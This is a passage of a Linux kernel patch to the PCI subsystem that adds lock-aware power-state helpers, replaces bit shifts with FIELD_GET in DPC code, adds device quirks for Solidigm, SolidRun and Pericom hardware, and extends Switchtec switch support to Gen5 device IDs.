++	__pci_walk_bus(top, cb, userdata, false);
+ }
+ EXPORT_SYMBOL_GPL(pci_walk_bus);
+ 
++void pci_walk_bus_locked(struct pci_bus *top, int (*cb)(struct pci_dev *, void *), void *userdata)
++{
++	lockdep_assert_held(&pci_bus_sem);
++
++	__pci_walk_bus(top, cb, userdata, true);
++}
++EXPORT_SYMBOL_GPL(pci_walk_bus_locked);
++
+ struct pci_bus *pci_bus_get(struct pci_bus *bus)
+ {
+ 	if (bus)
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 5368a37154cf9..67956bfebf879 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1258,6 +1258,7 @@ int pci_power_up(struct pci_dev *dev)
+ /**
+  * pci_set_full_power_state - Put a PCI device into D0 and update its state
+  * @dev: PCI device to power up
++ * @locked: whether pci_bus_sem is held
+  *
+  * Call pci_power_up() to put @dev into D0, read from its PCI_PM_CTRL register
+  * to confirm the state change, restore its BARs if they might be lost and
+@@ -1267,7 +1268,7 @@ int pci_power_up(struct pci_dev *dev)
+  * to D0, it is more efficient to use pci_power_up() directly instead of this
+  * function.
+  */
+-static int pci_set_full_power_state(struct pci_dev *dev)
++static int pci_set_full_power_state(struct pci_dev *dev, bool locked)
+ {
+ 	u16 pmcsr;
+ 	int ret;
+@@ -1303,7 +1304,7 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 	}
+ 
+ 	if (dev->bus->self)
+-		pcie_aspm_pm_state_change(dev->bus->self);
++		pcie_aspm_pm_state_change(dev->bus->self, locked);
+ 
+ 	return 0;
+ }
+@@ -1332,10 +1333,22 @@ void pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state)
+ 		pci_walk_bus(bus, __pci_dev_set_current_state, &state);
+ }
+ 
++static void __pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state, bool locked)
++{
++	if (!bus)
++		return;
++
++	if (locked)
++		pci_walk_bus_locked(bus, __pci_dev_set_current_state, &state);
++	else
++		pci_walk_bus(bus, __pci_dev_set_current_state, &state);
++}
++
+ /**
+  * pci_set_low_power_state - Put a PCI device into a low-power state.
+  * @dev: PCI device to handle.
+  * @state: PCI power state (D1, D2, D3hot) to put the device into.
++ * @locked: whether pci_bus_sem is held
+  *
+  * Use the device's PCI_PM_CTRL register to put it into a low-power state.
+  *
+@@ -1346,7 +1359,7 @@ void pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state)
+  * 0 if device already is in the requested state.
+  * 0 if device's power state has been successfully changed.
+  */
+-static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
++static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state, bool locked)
+ {
+ 	u16 pmcsr;
+ 
+@@ -1400,29 +1413,12 @@ static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
+ 				     pci_power_name(state));
+ 
+ 	if (dev->bus->self)
+-		pcie_aspm_pm_state_change(dev->bus->self);
++		pcie_aspm_pm_state_change(dev->bus->self, locked);
+ 
+ 	return 0;
+ }
+ 
+-/**
+- * pci_set_power_state - Set the power state of a PCI device
+- * @dev: PCI device to handle.
+- * @state: PCI power state (D0, D1, D2, D3hot) to put the device into.
+- *
+- * Transition a device to a new power state, using the platform firmware and/or
+- * the device's PCI PM registers.
+- *
+- * RETURN VALUE:
+- * -EINVAL if the requested state is invalid.
+- * -EIO if device does not support PCI PM or its PM capabilities register has a
+- * wrong version, or device doesn't support the requested state.
+- * 0 if the transition is to D1 or D2 but D1 and D2 are not supported.
+- * 0 if device already is in the requested state.
+- * 0 if the transition is to D3 but D3 is not supported.
+- * 0 if device's power state has been successfully changed.
+- */
+-int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
++static int __pci_set_power_state(struct pci_dev *dev, pci_power_t state, bool locked)
+ {
+ 	int error;
+ 
+@@ -1446,7 +1442,7 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		return 0;
+ 
+ 	if (state == PCI_D0)
+-		return pci_set_full_power_state(dev);
++		return pci_set_full_power_state(dev, locked);
+ 
+ 	/*
+ 	 * This device is quirked not to be put into D3, so don't put it in
+@@ -1460,16 +1456,16 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		 * To put the device in D3cold, put it into D3hot in the native
+ 		 * way, then put it into D3cold using platform ops.
+ 		 */
+-		error = pci_set_low_power_state(dev, PCI_D3hot);
++		error = pci_set_low_power_state(dev, PCI_D3hot, locked);
+ 
+ 		if (pci_platform_power_transition(dev, PCI_D3cold))
+ 			return error;
+ 
+ 		/* Powering off a bridge may power off the whole hierarchy */
+ 		if (dev->current_state == PCI_D3cold)
+-			pci_bus_set_current_state(dev->subordinate, PCI_D3cold);
++			__pci_bus_set_current_state(dev->subordinate, PCI_D3cold, locked);
+ 	} else {
+-		error = pci_set_low_power_state(dev, state);
++		error = pci_set_low_power_state(dev, state, locked);
+ 
+ 		if (pci_platform_power_transition(dev, state))
+ 			return error;
+@@ -1477,8 +1473,38 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 
+ 	return 0;
+ }
++
++/**
++ * pci_set_power_state - Set the power state of a PCI device
++ * @dev: PCI device to handle.
++ * @state: PCI power state (D0, D1, D2, D3hot) to put the device into.
++ *
++ * Transition a device to a new power state, using the platform firmware and/or
++ * the device's PCI PM registers.
++ *
++ * RETURN VALUE:
++ * -EINVAL if the requested state is invalid.
++ * -EIO if device does not support PCI PM or its PM capabilities register has a
++ * wrong version, or device doesn't support the requested state.
++ * 0 if the transition is to D1 or D2 but D1 and D2 are not supported.
++ * 0 if device already is in the requested state.
++ * 0 if the transition is to D3 but D3 is not supported.
++ * 0 if device's power state has been successfully changed.
++ */
++int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
++{
++	return __pci_set_power_state(dev, state, false);
++}
+ EXPORT_SYMBOL(pci_set_power_state);
+ 
++int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state)
++{
++	lockdep_assert_held(&pci_bus_sem);
++
++	return __pci_set_power_state(dev, state, true);
++}
++EXPORT_SYMBOL(pci_set_power_state_locked);
++
+ #define PCI_EXP_SAVE_REGS	7
+ 
+ static struct pci_cap_saved_state *_pci_find_saved_cap(struct pci_dev *pci_dev,
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index 9950deeb047a7..88576a22fecb1 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -556,12 +556,12 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ #ifdef CONFIG_PCIEASPM
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
+-void pcie_aspm_pm_state_change(struct pci_dev *pdev);
++void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
+-static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev) { }
++static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+ #endif
+ 
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 25736d408e88e..cf4acea6610d5 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -743,10 +743,10 @@ static void pcie_config_aspm_l1ss(struct pcie_link_state *link, u32 state)
+ 	 * in pcie_config_aspm_link().
+ 	 */
+ 	if (enable_req & (ASPM_STATE_L1_1 | ASPM_STATE_L1_2)) {
+-		pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
+-						   PCI_EXP_LNKCTL_ASPM_L1, 0);
+-		pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
+-						   PCI_EXP_LNKCTL_ASPM_L1, 0);
++		pcie_capability_clear_word(child, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPM_L1);
++		pcie_capability_clear_word(parent, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPM_L1);
+ 	}
+ 
+ 	val = 0;
+@@ -1055,8 +1055,11 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 	up_read(&pci_bus_sem);
+ }
+ 
+-/* @pdev: the root port or switch downstream port */
+-void pcie_aspm_pm_state_change(struct pci_dev *pdev)
++/*
++ * @pdev: the root port or switch downstream port
++ * @locked: whether pci_bus_sem is held
++ */
++void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked)
+ {
+ 	struct pcie_link_state *link = pdev->link_state;
+ 
+@@ -1066,12 +1069,14 @@ void pcie_aspm_pm_state_change(struct pci_dev *pdev)
+ 	 * Devices changed PM state, we should recheck if latency
+ 	 * meets all functions' requirement
+ 	 */
+-	down_read(&pci_bus_sem);
++	if (!locked)
++		down_read(&pci_bus_sem);
+ 	mutex_lock(&aspm_lock);
+ 	pcie_update_aspm_capable(link->root);
+ 	pcie_config_aspm_path(link);
+ 	mutex_unlock(&aspm_lock);
+-	up_read(&pci_bus_sem);
++	if (!locked)
++		up_read(&pci_bus_sem);
+ }
+ 
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev)
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index 08800282825e1..acdbf9e770a8a 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -9,6 +9,7 @@
+ #define dev_fmt(fmt) "DPC: " fmt
+ 
+ #include <linux/aer.h>
++#include <linux/bitfield.h>
+ #include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/init.h>
+@@ -203,7 +204,7 @@ static void dpc_process_rp_pio_error(struct pci_dev *pdev)
+ 
+ 	/* Get First Error Pointer */
+ 	pci_read_config_word(pdev, cap + PCI_EXP_DPC_STATUS, &dpc_status);
+-	first_error = (dpc_status & 0x1f00) >> 8;
++	first_error = FIELD_GET(PCI_EXP_DPC_RP_PIO_FEP, dpc_status);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(rp_pio_error_string); i++) {
+ 		if ((status & ~mask) & (1 << i))
+@@ -339,7 +340,7 @@ void pci_dpc_init(struct pci_dev *pdev)
+ 	/* Quirks may set dpc_rp_log_size if device or firmware is buggy */
+ 	if (!pdev->dpc_rp_log_size) {
+ 		pdev->dpc_rp_log_size =
+-			(cap & PCI_EXP_DPC_RP_PIO_LOG_SIZE) >> 8;
++				FIELD_GET(PCI_EXP_DPC_RP_PIO_LOG_SIZE, cap);
+ 		if (pdev->dpc_rp_log_size < 4 || pdev->dpc_rp_log_size > 9) {
+ 			pci_err(pdev, "RP PIO log size %u is invalid\n",
+ 				pdev->dpc_rp_log_size);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 289ba6902e41b..56dce858a6934 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -2425,9 +2425,9 @@ static void quirk_enable_clear_retrain_link(struct pci_dev *dev)
+ 	dev->clear_retrain_link = 1;
+ 	pci_info(dev, "Enable PCIe Retrain Link quirk\n");
+ }
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe110, quirk_enable_clear_retrain_link);
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe111, quirk_enable_clear_retrain_link);
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe130, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe110, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe111, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe130, quirk_enable_clear_retrain_link);
+ 
+ static void fixup_rev1_53c810(struct pci_dev *dev)
+ {
+@@ -4011,10 +4011,11 @@ static int nvme_disable_and_flr(struct pci_dev *dev, bool probe)
+ }
+ 
+ /*
+- * Intel DC P3700 NVMe controller will timeout waiting for ready status
+- * to change after NVMe enable if the driver starts interacting with the
+- * device too soon after FLR.  A 250ms delay after FLR has heuristically
+- * proven to produce reliably working results for device assignment cases.
++ * Some NVMe controllers such as Intel DC P3700 and Solidigm P44 Pro will
++ * timeout waiting for ready status to change after NVMe enable if the driver
++ * starts interacting with the device too soon after FLR.  A 250ms delay after
++ * FLR has heuristically proven to produce reliably working results for device
++ * assignment cases.
+  */
+ static int delay_250ms_after_flr(struct pci_dev *dev, bool probe)
+ {
+@@ -4101,6 +4102,7 @@ static const struct pci_dev_reset_methods pci_dev_reset_methods[] = {
+ 	{ PCI_VENDOR_ID_SAMSUNG, 0xa804, nvme_disable_and_flr },
+ 	{ PCI_VENDOR_ID_INTEL, 0x0953, delay_250ms_after_flr },
+ 	{ PCI_VENDOR_ID_INTEL, 0x0a54, delay_250ms_after_flr },
++	{ PCI_VENDOR_ID_SOLIDIGM, 0xf1ac, delay_250ms_after_flr },
+ 	{ PCI_VENDOR_ID_CHELSIO, PCI_ANY_ID,
+ 		reset_chelsio_generic_dev },
+ 	{ PCI_VENDOR_ID_HUAWEI, PCI_DEVICE_ID_HINIC_VF,
+@@ -4474,9 +4476,9 @@ static void quirk_disable_root_port_attributes(struct pci_dev *pdev)
+ 
+ 	pci_info(root_port, "Disabling No Snoop/Relaxed Ordering Attributes to avoid PCIe Completion erratum in %s\n",
+ 		 dev_name(&pdev->dev));
+-	pcie_capability_clear_and_set_word(root_port, PCI_EXP_DEVCTL,
+-					   PCI_EXP_DEVCTL_RELAX_EN |
+-					   PCI_EXP_DEVCTL_NOSNOOP_EN, 0);
++	pcie_capability_clear_word(root_port, PCI_EXP_DEVCTL,
++				   PCI_EXP_DEVCTL_RELAX_EN |
++				   PCI_EXP_DEVCTL_NOSNOOP_EN);
+ }
+ 
+ /*
+@@ -5403,6 +5405,14 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
++/* FLR may cause the SolidRun SNET DPU (rev 0x1) to hang */
++static void quirk_no_flr_snet(struct pci_dev *dev)
++{
++	if (dev->revision == 0x1)
++		quirk_no_flr(dev);
++}
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SOLIDRUN, 0x1000, quirk_no_flr_snet);
++
+ static void quirk_no_ext_tags(struct pci_dev *pdev)
+ {
+ 	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
+@@ -5808,6 +5818,42 @@ SWITCHTEC_QUIRK(0x4428);  /* PSXA 28XG4 */
+ SWITCHTEC_QUIRK(0x4552);  /* PAXA 52XG4 */
+ SWITCHTEC_QUIRK(0x4536);  /* PAXA 36XG4 */
+ SWITCHTEC_QUIRK(0x4528);  /* PAXA 28XG4 */
++SWITCHTEC_QUIRK(0x5000);  /* PFX 100XG5 */
++SWITCHTEC_QUIRK(0x5084);  /* PFX 84XG5 */
++SWITCHTEC_QUIRK(0x5068);  /* PFX 68XG5 */
++SWITCHTEC_QUIRK(0x5052);  /* PFX 52XG5 */
++SWITCHTEC_QUIRK(0x5036);  /* PFX 36XG5 */
++SWITCHTEC_QUIRK(0x5028);  /* PFX 28XG5 */
++SWITCHTEC_QUIRK(0x5100);  /* PSX 100XG5 */
++SWITCHTEC_QUIRK(0x5184);  /* PSX 84XG5 */
++SWITCHTEC_QUIRK(0x5168);  /* PSX 68XG5 */
++SWITCHTEC_QUIRK(0x5152);  /* PSX 52XG5 */
++SWITCHTEC_QUIRK(0x5136);  /* PSX 36XG5 */
++SWITCHTEC_QUIRK(0x5128);  /* PSX 28XG5 */
++SWITCHTEC_QUIRK(0x5200);  /* PAX 100XG5 */
++SWITCHTEC_QUIRK(0x5284);  /* PAX 84XG5 */
++SWITCHTEC_QUIRK(0x5268);  /* PAX 68XG5 */
++SWITCHTEC_QUIRK(0x5252);  /* PAX 52XG5 */
++SWITCHTEC_QUIRK(0x5236);  /* PAX 36XG5 */
++SWITCHTEC_QUIRK(0x5228);  /* PAX 28XG5 */
++SWITCHTEC_QUIRK(0x5300);  /* PFXA 100XG5 */
++SWITCHTEC_QUIRK(0x5384);  /* PFXA 84XG5 */
++SWITCHTEC_QUIRK(0x5368);  /* PFXA 68XG5 */
++SWITCHTEC_QUIRK(0x5352);  /* PFXA 52XG5 */
++SWITCHTEC_QUIRK(0x5336);  /* PFXA 36XG5 */
++SWITCHTEC_QUIRK(0x5328);  /* PFXA 28XG5 */
++SWITCHTEC_QUIRK(0x5400);  /* PSXA 100XG5 */
++SWITCHTEC_QUIRK(0x5484);  /* PSXA 84XG5 */
++SWITCHTEC_QUIRK(0x5468);  /* PSXA 68XG5 */
++SWITCHTEC_QUIRK(0x5452);  /* PSXA 52XG5 */
++SWITCHTEC_QUIRK(0x5436);  /* PSXA 36XG5 */
++SWITCHTEC_QUIRK(0x5428);  /* PSXA 28XG5 */
++SWITCHTEC_QUIRK(0x5500);  /* PAXA 100XG5 */
++SWITCHTEC_QUIRK(0x5584);  /* PAXA 84XG5 */
++SWITCHTEC_QUIRK(0x5568);  /* PAXA 68XG5 */
++SWITCHTEC_QUIRK(0x5552);  /* PAXA 52XG5 */
++SWITCHTEC_QUIRK(0x5536);  /* PAXA 36XG5 */
++SWITCHTEC_QUIRK(0x5528);  /* PAXA 28XG5 */
+ 
+ /*
+  * The PLX NTB uses devfn proxy IDs to move TLPs between NT endpoints.
+@@ -6057,7 +6103,7 @@ static void dpc_log_size(struct pci_dev *dev)
+ 	if (!(val & PCI_EXP_DPC_CAP_RP_EXT))
+ 		return;
+ 
+-	if (!((val & PCI_EXP_DPC_RP_PIO_LOG_SIZE) >> 8)) {
++	if (FIELD_GET(PCI_EXP_DPC_RP_PIO_LOG_SIZE, val) == 0) {
+ 		pci_info(dev, "Overriding RP PIO Log Size to 4\n");
+ 		dev->dpc_rp_log_size = 4;
+ 	}
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index d05a482639e3c..332af6938d7fd 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -372,7 +372,7 @@ static ssize_t field ## _show(struct device *dev, \
+ 	if (stdev->gen == SWITCHTEC_GEN3) \
+ 		return io_string_show(buf, &si->gen3.field, \
+ 				      sizeof(si->gen3.field)); \
+-	else if (stdev->gen == SWITCHTEC_GEN4) \
++	else if (stdev->gen >= SWITCHTEC_GEN4) \
+ 		return io_string_show(buf, &si->gen4.field, \
+ 				      sizeof(si->gen4.field)); \
+ 	else \
+@@ -663,7 +663,7 @@ static int ioctl_flash_info(struct switchtec_dev *stdev,
+ 	if (stdev->gen == SWITCHTEC_GEN3) {
+ 		info.flash_length = ioread32(&fi->gen3.flash_length);
+ 		info.num_partitions = SWITCHTEC_NUM_PARTITIONS_GEN3;
+-	} else if (stdev->gen == SWITCHTEC_GEN4) {
++	} else if (stdev->gen >= SWITCHTEC_GEN4) {
+ 		info.flash_length = ioread32(&fi->gen4.flash_length);
+ 		info.num_partitions = SWITCHTEC_NUM_PARTITIONS_GEN4;
+ 	} else {
+@@ -870,7 +870,7 @@ static int ioctl_flash_part_info(struct switchtec_dev *stdev,
+ 		ret = flash_part_info_gen3(stdev, &info);
+ 		if (ret)
+ 			return ret;
+-	} else if (stdev->gen == SWITCHTEC_GEN4) {
++	} else if (stdev->gen >= SWITCHTEC_GEN4) {
+ 		ret = flash_part_info_gen4(stdev, &info);
+ 		if (ret)
+ 			return ret;
+@@ -1606,7 +1606,7 @@ static int switchtec_init_pci(struct switchtec_dev *stdev,
+ 
+ 	if (stdev->gen == SWITCHTEC_GEN3)
+ 		part_id = &stdev->mmio_sys_info->gen3.partition_id;
+-	else if (stdev->gen == SWITCHTEC_GEN4)
++	else if (stdev->gen >= SWITCHTEC_GEN4)
+ 		part_id = &stdev->mmio_sys_info->gen4.partition_id;
+ 	else
+ 		return -EOPNOTSUPP;
+@@ -1740,63 +1740,99 @@ static void switchtec_pci_remove(struct pci_dev *pdev)
+ 	}
+ 
+ static const struct pci_device_id switchtec_pci_tbl[] = {
+-	SWITCHTEC_PCI_DEVICE(0x8531, SWITCHTEC_GEN3),  //PFX 24xG3
+-	SWITCHTEC_PCI_DEVICE(0x8532, SWITCHTEC_GEN3),  //PFX 32xG3
+-	SWITCHTEC_PCI_DEVICE(0x8533, SWITCHTEC_GEN3),  //PFX 48xG3
+-	SWITCHTEC_PCI_DEVICE(0x8534, SWITCHTEC_GEN3),  //PFX 64xG3
+-	SWITCHTEC_PCI_DEVICE(0x8535, SWITCHTEC_GEN3),  //PFX 80xG3
+-	SWITCHTEC_PCI_DEVICE(0x8536, SWITCHTEC_GEN3),  //PFX 96xG3
+-	SWITCHTEC_PCI_DEVICE(0x8541, SWITCHTEC_GEN3),  //PSX 24xG3
+-	SWITCHTEC_PCI_DEVICE(0x8542, SWITCHTEC_GEN3),  //PSX 32xG3
+-	SWITCHTEC_PCI_DEVICE(0x8543, SWITCHTEC_GEN3),  //PSX 48xG3
+-	SWITCHTEC_PCI_DEVICE(0x8544, SWITCHTEC_GEN3),  //PSX 64xG3
+-	SWITCHTEC_PCI_DEVICE(0x8545, SWITCHTEC_GEN3),  //PSX 80xG3
+-	SWITCHTEC_PCI_DEVICE(0x8546, SWITCHTEC_GEN3),  //PSX 96xG3
+-	SWITCHTEC_PCI_DEVICE(0x8551, SWITCHTEC_GEN3),  //PAX 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8552, SWITCHTEC_GEN3),  //PAX 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8553, SWITCHTEC_GEN3),  //PAX 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8554, SWITCHTEC_GEN3),  //PAX 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8555, SWITCHTEC_GEN3),  //PAX 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8556, SWITCHTEC_GEN3),  //PAX 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x8561, SWITCHTEC_GEN3),  //PFXL 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8562, SWITCHTEC_GEN3),  //PFXL 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8563, SWITCHTEC_GEN3),  //PFXL 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8564, SWITCHTEC_GEN3),  //PFXL 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8565, SWITCHTEC_GEN3),  //PFXL 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8566, SWITCHTEC_GEN3),  //PFXL 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x8571, SWITCHTEC_GEN3),  //PFXI 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8572, SWITCHTEC_GEN3),  //PFXI 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8573, SWITCHTEC_GEN3),  //PFXI 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8574, SWITCHTEC_GEN3),  //PFXI 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8575, SWITCHTEC_GEN3),  //PFXI 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8576, SWITCHTEC_GEN3),  //PFXI 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x4000, SWITCHTEC_GEN4),  //PFX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4084, SWITCHTEC_GEN4),  //PFX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4068, SWITCHTEC_GEN4),  //PFX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4052, SWITCHTEC_GEN4),  //PFX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4036, SWITCHTEC_GEN4),  //PFX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4028, SWITCHTEC_GEN4),  //PFX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4100, SWITCHTEC_GEN4),  //PSX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4184, SWITCHTEC_GEN4),  //PSX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4168, SWITCHTEC_GEN4),  //PSX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4152, SWITCHTEC_GEN4),  //PSX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4136, SWITCHTEC_GEN4),  //PSX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4128, SWITCHTEC_GEN4),  //PSX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4200, SWITCHTEC_GEN4),  //PAX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4284, SWITCHTEC_GEN4),  //PAX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4268, SWITCHTEC_GEN4),  //PAX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4252, SWITCHTEC_GEN4),  //PAX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4236, SWITCHTEC_GEN4),  //PAX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4228, SWITCHTEC_GEN4),  //PAX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4352, SWITCHTEC_GEN4),  //PFXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4336, SWITCHTEC_GEN4),  //PFXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4328, SWITCHTEC_GEN4),  //PFXA 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4452, SWITCHTEC_GEN4),  //PSXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4436, SWITCHTEC_GEN4),  //PSXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4428, SWITCHTEC_GEN4),  //PSXA 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4552, SWITCHTEC_GEN4),  //PAXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4536, SWITCHTEC_GEN4),  //PAXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4528, SWITCHTEC_GEN4),  //PAXA 28XG4
++	SWITCHTEC_PCI_DEVICE(0x8531, SWITCHTEC_GEN3),  /* PFX 24xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8532, SWITCHTEC_GEN3),  /* PFX 32xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8533, SWITCHTEC_GEN3),  /* PFX 48xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8534, SWITCHTEC_GEN3),  /* PFX 64xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8535, SWITCHTEC_GEN3),  /* PFX 80xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8536, SWITCHTEC_GEN3),  /* PFX 96xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8541, SWITCHTEC_GEN3),  /* PSX 24xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8542, SWITCHTEC_GEN3),  /* PSX 32xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8543, SWITCHTEC_GEN3),  /* PSX 48xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8544, SWITCHTEC_GEN3),  /* PSX 64xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8545, SWITCHTEC_GEN3),  /* PSX 80xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8546, SWITCHTEC_GEN3),  /* PSX 96xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8551, SWITCHTEC_GEN3),  /* PAX 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8552, SWITCHTEC_GEN3),  /* PAX 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8553, SWITCHTEC_GEN3),  /* PAX 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8554, SWITCHTEC_GEN3),  /* PAX 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8555, SWITCHTEC_GEN3),  /* PAX 80XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8556, SWITCHTEC_GEN3),  /* PAX 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8561, SWITCHTEC_GEN3),  /* PFXL 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8562, SWITCHTEC_GEN3),  /* PFXL 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8563, SWITCHTEC_GEN3),  /* PFXL 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8564, SWITCHTEC_GEN3),  /* PFXL 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8565, SWITCHTEC_GEN3),  /* PFXL 80XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8566, SWITCHTEC_GEN3),  /* PFXL 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8571, SWITCHTEC_GEN3),  /* PFXI 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8572, SWITCHTEC_GEN3),  /* PFXI 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8573, SWITCHTEC_GEN3),  /* PFXI 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8574, SWITCHTEC_GEN3),  /* PFXI 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8575, SWITCHTEC_GEN3),  /* PFXI 80XG3 */
